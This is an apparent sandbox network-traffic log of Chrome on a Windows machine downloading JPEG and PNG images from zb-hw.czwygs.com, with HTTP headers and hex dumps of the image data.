                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 7d 01 ed f6 32 1c db cb 62 a6 58 3d f2 a6 88 1b 73 d1 b5 9c ac a8 13 df e8 24 62 0c 05 d7 b1 ea b8 74 9c f9 e6 34 cc 4a f6 ce 24 4d 5a 8a 31 a4 ac e4 89 89 03 28 55 66 86 31 86 2b 9d 1c 9b f8 ba 6d 02 0c 7d 1d 43 5f ae 66 7e fe 22 1c 50 75 10 07 77 9d 31 e4 20 8e fe ec 93 40 74 17 86 6e a2 50 28 c3 d4 2b 78 ff fb 3e 88 a9 c9 9d b8 7d 6b 09 cd 46 07 a7 4f 9f 66 06 e9 bd ef 7b 37 2c bb 89 d3 a7 9e 45 a3 39 87 4e 77 09 6e bf 1b ca c3 10 b8 4a 61 0c a9 64 51 d4 98 c7 0c 2f 65 1c 73 83 41 f1 8e 5a 11 96 a5 a1 db 2a e2 6f ff e6 14 7a 5d 1d cb 5d 1b f5 22 70 ff 03 fb 50 1b d1 30 3d 55 f7 81 e1 e1 00 18 b6 db 0d 9c 3e fd 12 03 86 3c 2b 99 cf 91 b4 85 c4 73 b5 79 06 91 98 2a ce 4e 11 7b 4a 9a 59 14 20 4e ff 2f 73 6f 26 e6 9f 0f 0e 09 d4 89 0b 4b e6 7b f8 37 bd d3
                                                                                                                                                          Data Ascii: }2bX=s$bt4J$MZ1(Uf1+m}C_f~"Puw1 @tnP(+x>}kFOf{7,E9NwnJadQ/esAZ*oz]]"pP0=U><+sy*N{JY N/so&K{7
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 1b 91 ac 5b b0 84 fa c2 e7 5a dd 2e c1 cb 95 cb 7b 04 f9 1c b8 93 6d 96 f0 d6 03 43 57 d0 39 79 53 1e 35 0f d2 d6 bc eb 42 be d3 81 21 57 41 f1 10 32 20 82 d7 a3 e6 e7 5e 6d e1 db 0d 0c 47 b5 d7 05 de 58 33 f6 2b ce 90 ed 0e f2 d2 e7 f3 8d cc c3 1c d1 b0 c0 31 be a7 cf e0 10 57 a7 ad ed 3e f9 03 61 c9 f0 3f bc 24 c6 50 18 c3 07 1f 5c a3 72 35 43 6b 07 67 28 57 18 50 a7 b5 45 83 a1 4f d9 2c c2 4a 2c 31 7d a3 23 1a 3e df 8d 01 43 b7 f6 70 0c 00 a6 d6 86 4e ee 8f 98 1c 8e c3 b0 6a 7b f5 b2 31 dd d1 d8 c1 3c 7a 9f 9b b5 cf b1 fd 65 4c a2 22 f8 9e ab 0b 9a 92 95 1c d0 1f 18 3b a3 63 c8 8c a1 e7 49 ad e4 4f fd a6 bf b4 fc 0e 9a 5e 3a 24 c0 10 53 20 23 31 e8 fb 31 86 a3 56 fd 9d ff fe 3d 0e 0c c1 36 39 82 cf 77 29 30 0c 32 ed 02 c6 30 d9 a0 41 b7 d0 66 2f 94 35
                                                                                                                                                          Data Ascii: [Z.{mCW9yS5B!WA2 ^mGX3+1W>a?$P\r5Ckg(WPEO,J,1}#>CpNj{1<zeL";cIO^:$S #11V=69w)020Af/5
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 4c 8e 64 4c c9 4f b9 fb be 2b 79 d4 28 dc 99 ef df 73 c0 f0 d3 9f fa 3b b4 ce b5 92 a1 ab 25 81 d6 ca 18 72 b9 24 15 d2 35 e3 a9 27 4d 3b c8 3f 6d a8 71 bd 10 18 22 41 23 aa d9 87 45 85 97 0a e5 8a fb 4e 4e c8 92 74 21 15 5d e4 7d a9 85 aa 00 50 93 3e 18 1c d8 f2 1d 56 63 70 1d b0 42 00 86 ca e0 a8 a6 19 1b 51 96 bd 30 a5 cd 9c 87 e0 2c 46 8e 47 8a 4a a1 a8 9b 16 31 5c c8 52 84 28 af 00 0e 31 dc 76 25 0c 16 ef 6d b4 19 f8 05 1e a0 e0 94 2d c6 4d 2b 3e 68 dc 96 30 21 00 32 60 43 7c de 44 20 98 8c e0 7d 49 e2 50 17 9a 80 65 7b 43 16 26 0d 59 c6 21 b0 d4 92 6d f2 bc f1 f8 1b 81 75 61 09 b3 80 d9 cb 20 3b ba 40 eb 1b 3b d4 ed 0c e8 fc f9 0d 6a f7 31 56 c2 ff e9 8b e3 24 1d 60 58 28 64 a8 c4 c0 30 4b dd 6e db 80 42 01 87 92 38 11 26 8c 00 2c e1 19 66 66 e6 1c
                                                                                                                                                          Data Ascii: LdLO+y(s;%r$5'M;?mq"A#ENNt!]}P>VcpBQ0,FGJ1\R(1v%m-M+>h0!2`C|D }IPe{C&Y!mua ;@;j1V$`X(d0KnB8&,ff
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 29 76 76 77 05 55 81 cb 0b 0b 1c 77 1b 9b 70 09 b0 c0 c4 74 b8 26 62 04 6e 16 18 e2 5e e0 05 af 44 f5 ce f3 a9 e1 43 85 85 00 bd 05 6f 3b c8 2c 38 f5 74 01 b5 be 7c 8e a5 76 94 bc dd 44 42 1e 79 e8 61 19 1e 18 94 ff e6 03 ff 35 bd f5 20 f1 69 7a ba e1 44 a3 cd f9 73 17 79 5d c1 10 e2 3e 6f 6f 15 65 b7 52 96 7f ff d4 bf e7 f1 5e bc 3c cf 4a c5 fa f6 26 59 e2 de f9 38 95 4c 77 01 43 30 95 d9 4c 4a 56 af ce 4b 2a de 92 74 a2 25 69 c7 93 6c 2a 26 99 64 4b 6a 95 ab 92 4a d5 25 93 69 49 c6 c5 78 c1 3c e4 c8 ea 62 51 3c 3f 23 4d cf 11 4f d2 b2 b5 59 e6 18 80 66 32 95 e9 c8 d0 70 46 2a 8d 8e 3c ff 4a 59 76 2a 22 8d ba aa 31 06 06 91 e2 92 91 bb ee ba 5b d2 99 82 2c 6f ee c9 d2 46 49 5e bb 70 91 e9 24 a3 e3 93 1c 73 23 43 90 3a c4 e5 ec 99 53 c1 f5 8f 6a 57 75 de
                                                                                                                                                          Data Ascii: )vvwUwpt&bn^DCo;,8t|vDBya5 izDsy]>ooeR^<J&Y8LwC0LJVK*t%il*&dKjJ%iIx<bQ<?#MOYf2pF*<JYv*"1[,oFI^p$s#C:SjWu


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          260192.168.2.55000723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC636OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE1[5],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2489241
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b3f571f4be3c7a48af99c5809ecbc190
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 102759
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15766INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: ce 77 e7 75 9e 86 c7 0c cf 0c 2e cf 1d 82 44 58 aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e ea 2c d7 80 a5 ac 7e ac 7b 95 0b 3a 10 45 6d 59
                                                                                                                                                          Data Ascii: wu.DX+EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n,~{:EmY
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 5a 77 30 b8 50 66 ae 36 0d 4f d9 a3 92 93 c9 43 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26 e7 f2 ad 11 89 9e 4c 9f 4b 48 d2 33 9d bb 2d 11
                                                                                                                                                          Data Ascii: Zw0Pf6OCPe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&LKH3-
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: f5 bd 1b e9 a3 a0 a8 8e 46 be 9a 5d 24 9c 1c 92 d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db b4 6a 6c dd 59 4f 4c 58 7c a7 12 dc 64 e4 05 bb
                                                                                                                                                          Data Ascii: F]$2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"jlYOLX|d
                                                                                                                                                          2024-06-09 22:41:04 UTC10738INData Raw: ae b5 14 94 64 6e e8 df 2f 98 7f fa 58 0e 54 16 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b 07 01 24 78 fb 8c 15 7b 6c e8 c6 99 5d 04 62 32
                                                                                                                                                          Data Ascii: dn/XT_4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;$x{l]b2


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          261192.168.2.55001390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC641OUTGET /pc/image-pc/index/312/app/06.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 97993
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:48 GMT
                                                                                                                                                          ETag: "6214aa78-17ec9"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[5],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE5[24],EU-GER-frankfurt-GLOBAL1-CACHE5[0,TCP_HIT,22],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8fc42169c91273a1266197c7ea3a73c9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15758INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 8a 00 00 02 c9 08 03 00 00 00 9d 84 94 7d 00 00 03 00 50 4c 54 45 00 00 00 40 44 42 37 3b 39 32 36 33 33 37 33 26 2c 28 33 38 34 1a 24 1d 1f 23 1e 1a 1f 1b 1f 22 1e 19 1c 18 1c 34 2a 1c 1f 1c 18 1a 17 24 29 24 18 1a 17 19 1b 17 17 19 16 af af af 11 13 11 11 13 10 36 3d 37 2b 2f 2b f3 f3 f3 1a 1d 18 ab ac ab 1b 1f 1a 48 49 47 c9 cb c9 f2 f2 f1 da db d9 dd dd db c1 c1 bf ea e9 e8 84 83 7f 9c 9b 96 d5 d4 d2 6d 69 6b 70 6c 62 94 8c 8c c1 bf bb ab a8 a7 ff ff ff fa fb fb f6 f7 f8 f4 f5 f3 ee ef f3 f1 f3 f6 f1 f1 ef ea eb f0 ed ee eb e2 e5 eb e9 ea e8 e6 e8 e3 e6 e8 ee de e1 e9 e0 e2 e3 d9 dd e7 df e3 d8 e3 e6 dd d6 d7 e2 d0 d4 e0 b7 bb cb ab b0 c1 db df d3 c2 c7 d6 b3 b8 c7 bb bf cf af b4 c5 d3 d9 c7 c0
                                                                                                                                                          Data Ascii: PNGIHDR}PLTE@DB7;9263373&,(384$#"4*$)$6=7+/+HIGmikplb
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: 02 0b 1d 12 9e de 7f 92 41 9d 6e 77 20 0c 4c 9a 96 b2 e7 65 33 49 60 fc 8c 61 ce 49 64 69 c8 63 c5 43 90 57 49 19 74 89 34 8a 27 94 f2 ac a9 44 90 86 3c e0 82 44 9c 0a 1e 86 f7 0e d7 ee 29 dd de db 9f df 1b c3 92 6d ed f6 ca ec 31 46 7f e3 a0 bb b3 e3 5b 70 ba 47 07 f3 b7 be de 1e eb 8d 94 8e a6 cf dc b8 f1 71 94 c7 dd 6e da 41 9e bb 1e bd 99 d2 d2 c8 cf 9b 67 72 9b 89 96 77 fc 86 b2 76 eb 5d 08 47 c3 b9 b6 60 ac dd 56 74 81 51 ce e0 fe be e4 87 1f 0c 57 87 42 50 65 0a 99 e1 dd 28 0a 3e d8 46 c6 7c dc 09 5e 5c 58 58 e6 e3 c3 4f 45 10 0e 00 05 83 33 23 bd 33 29 c1 13 8f 5d d0 49 44 d4 49 95 e3 49 27 50 38 c1 a8 55 84 e0 2d c7 e7 01 c5 c9 6a fb 34 a1 98 60 48 f5 94 16 30 6c 30 a7 bc 42 6a 1a 04 94 5a 9b f8 a4 10 3e 4f 85 11 9d c4 78 4e 44 1c fc 07 12 b0 02
                                                                                                                                                          Data Ascii: Anw Le3I`aIdicCWIt4'D<D)m1F[pGqnAgrwv]G`VtQWBPe(>F|^\XXOE3#3)]IDII'P8U-j4`H0l0BjZ>OxND
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: ae b1 81 a4 68 a8 af ad af a3 5a ea 0d 21 e8 a2 88 32 b9 20 86 12 09 31 c5 0d f1 b0 80 87 4a 10 8d 15 cd b7 10 02 46 8e 9a f4 72 cd 34 9d 07 2f a0 28 88 4c 13 c0 e8 d9 c2 d1 17 96 42 20 01 77 04 4f b0 1e f6 1b f8 28 36 2e 3d 7b 87 90 4b bc af 07 ef 08 d7 9e 53 85 ed 8b c7 67 87 97 40 0b 5a 0b 09 05 b1 98 1d 9e 76 ae 5f 9a 76 9c 7b de 7f 0e 85 6c 5f 5e b3 02 8a cd 04 42 40 b1 47 89 3b 7d 6d 1f bb 9c ee 7a 78 50 86 2e 1b 5f 43 b0 16 18 10 b6 00 26 3d 2d 8a 89 e1 72 39 ea 99 f7 80 00 08 3c b3 0c 10 16 71 ab cb dd 0f 23 d1 a7 aa 4a 0a 22 bb 5e 86 32 e8 23 93 b3 5b 21 a0 46 c3 c1 78 26 e8 d3 a8 71 04 1b ca a6 01 f5 8f 98 e8 19 94 d5 1e d1 6c 2e 92 19 c2 8e 94 3f 84 14 2c 62 0d 40 61 e0 4e 11 50 4c 20 6a 14 d5 ba 76 0e 3d 65 13 49 21 86 99 64 00 1a 7c 21 01 12
                                                                                                                                                          Data Ascii: hZ!2 1JFr4/(LB wO(6.={KSg@Zv_v{l_^B@G;}mzxP._C&=-r9<q#J"^2#[!Fx&ql.?,b@aNPL jv=eI!d|!
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: a5 b9 fe f8 d5 df 59 ed 4b a3 52 21 53 8e 83 e2 67 90 77 c7 83 85 70 70 81 26 8e 9c 81 a3 f5 99 49 46 6c c9 97 d4 85 88 99 5a c8 e7 f9 e7 17 a4 27 14 06 1f 78 6d 7a 7c f1 c8 12 b7 2e 10 f0 27 96 58 1a 1e be fc 5a 74 7b cf 35 e4 7c b4 93 13 53 33 2b ef 05 8a f7 7c 28 79 e2 ca c2 bc 74 36 6c 31 b0 d4 71 36 fa f1 d5 77 72 45 dc 39 c7 c8 8c 8f 5c 11 50 04 14 e5 e3 0c 9f 95 f7 f5 da 06 02 89 38 da 56 8d 44 2c 48 28 ed d1 2a 9e 0e 28 f1 44 54 13 be c8 53 16 48 2e 45 5b 6d 71 86 d7 2b 30 93 93 de 4e ab ca cd 81 45 0c 8c db cc 61 bd ee 6c 77 f5 a2 d2 94 c4 62 0a 94 1d 10 e8 69 6f f3 0b 6d b8 9a 18 67 4d 47 33 82 b6 81 18 9d 74 b2 e2 2e 7c 27 39 2e 9b 6a 84 12 b8 54 92 a9 d1 40 e0 4f 5a c1 b5 77 83 1f 24 78 4d 32 99 a8 95 7d c8 f0 e1 68 38 be 4a 2b 59 79 af d0 d3
                                                                                                                                                          Data Ascii: YKR!Sgwpp&IFlZ'xmz|.'XZt{5|S3+|(yt6l1q6wrE9\P8VD,H(*(DTSH.E[mq+0NEalwbiomgMG3t.|'9.jT@OZw$xM2}h8J+Yy
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: cb 95 f4 14 b6 8c 72 3a b3 d8 f0 fc f0 c2 2f db d7 ae 5d 5b 5a 39 dc fc aa d8 58 73 7b 45 af 29 ec 94 7e 57 70 6a 04 26 c2 42 e0 b4 59 a0 3f 77 20 17 19 1d 8b 0d 84 bf 78 37 a9 6f 54 ea d7 d2 a6 ae e7 8b c5 bc ae 57 f0 a3 eb 0f a1 b1 a7 8c 94 aa 30 50 10 20 8c a1 87 e3 a3 f7 3e 1e 1a 9f 48 4f 8d 87 35 1f 46 1a dc 8a c2 fb 4d b9 1c 8d cd 8b 34 a3 45 a7 32 62 b7 99 78 95 9d b3 f6 6d 88 6a 55 b5 8f 2e a2 60 92 55 12 19 66 84 c2 b8 bc 97 b9 be 59 8d 15 6f 1a 5a cc 3f 93 79 2f 18 5c d9 de 06 86 a5 6b d7 f0 b1 b2 b9 79 bd b8 e7 ec 15 63 00 bc bd 77 fb 31 f4 62 a2 5f be d7 a0 85 72 aa 39 93 18 35 8e 17 9f a7 91 3b ef f3 d7 a7 92 21 b3 fe fe 93 fa b8 5e 2c 3e 9a 4c 16 21 f9 7c e2 a9 f1 2c 5b de f6 28 2b 5b 64 83 1e ff 87 37 30 12 f7 8d 0e f4 e2 9d 2b ec d3 58 a0
                                                                                                                                                          Data Ascii: r:/][Z9Xs{E)~Wpj&BY?w x7oTW0P >HO5FM4E2bxmjU.`UfYoZ?y/\kycw1b_r95;!^,>L!|,[(+[d70+X
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: f1 ee e4 9a ac 57 82 65 84 ed 3c 0c 20 0e f2 45 7e d1 7a d8 d2 50 93 44 11 c4 3a 33 9a d5 a5 52 71 d7 5c f9 dd 39 9f 2b 31 76 a6 09 e5 f4 94 dd 7e dd 90 09 4c 77 30 10 92 2c b8 70 df b0 65 64 64 6c cc 9e 0a 8d 06 5e cd 15 e2 a6 e9 a1 69 d2 84 6e ca b2 9b bb 1a 06 8a df 80 42 12 45 a9 14 9b 1f b7 8c 5b 82 68 d1 5e 64 67 96 a1 50 4f 65 88 44 7a 2f 10 08 f7 4e 39 6c 12 08 70 90 93 c1 d7 b2 0c 1e 07 76 3d 85 94 b6 a3 ae da 5e 9d 79 66 7e 27 b7 2e b3 e6 13 c9 a5 f7 40 63 e5 18 19 ed d2 e7 db d6 a6 64 83 51 30 51 a0 a8 40 cb 29 6c 8f 97 7f 99 74 95 5d 73 73 93 93 63 86 a7 d7 28 89 55 2b 7b 7a 07 d3 86 eb 71 04 6c 06 41 2e a7 17 34 05 c3 86 d1 d1 b8 65 dc 97 0a 8c a6 a3 b8 d1 5c 37 44 20 20 8a a9 f1 5c 2e d6 37 f0 ba 84 82 42 45 2e 57 02 09 cb 98 ab 8f 43 b4 b8
                                                                                                                                                          Data Ascii: We< E~zPD:3Rq\9+1v~Lw0,peddl^inBE[h^dgPOeDz/N9lpv=^yf~'.@cdQ0Q@)lt]ssc(U+{zqlA.4e\7D \.7BE.WC
                                                                                                                                                          2024-06-09 22:41:04 UTC315INData Raw: 76 9f db 3d 27 db 87 a4 27 08 35 e9 2e d2 1d ec df 5d 49 d8 83 0b 19 db fc 75 ac 17 ba 3b fb 6c 43 d3 9e 72 cf fc 7e 4c 31 77 ae 41 71 c4 81 a1 a1 8b 8b 44 bb cf 89 a7 ef 7d e3 8e 5f fa 8a c1 0d 00 99 e2 d2 4c c3 ee f1 9a 7a 47 b0 a3 a9 63 9f 70 8a 90 4f 9a fa 88 af db 93 e5 50 da 5a c9 cf 7a 69 1c e8 54 94 4c ca bb dd 0a d4 69 e9 68 bb bf a9 2f 1d 9c 60 26 86 b6 72 74 d2 1b de 87 26 7d ce fd 95 01 0f 18 68 27 da 3d 16 09 7d 87 b4 53 c3 a5 2e 88 21 87 ce e5 3a ce c7 2e 84 41 97 47 3a f8 45 92 a0 0f 87 27 23 68 5c a4 e1 87 bb ee 2b 57 68 69 c9 44 0a 1a d7 ff c8 b5 5e b5 3b f3 23 a2 85 75 1e e7 6f aa 1a 93 d4 99 d2 a5 90 09 5a ea 08 d7 38 cf 3f 2f 7d 88 81 7c 7d 2a 21 fb 80 46 e2 7d de 66 52 dd 15 02 c3 02 85 69 a4 17 a7 49 5d 01 1a 79 ac e6 28 2b 3e b2 0f
                                                                                                                                                          Data Ascii: v=''5.]Iu;lCr~L1wAqD}_LzGcpOPZziTLih/`&rt&}h'=}S.!:.AG:E'#h\+WhiD^;#uoZ8?/}|}*!F}fRiI]y(+>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          262192.168.2.55001490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC641OUTGET /pc/image-pc/index/312/app/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
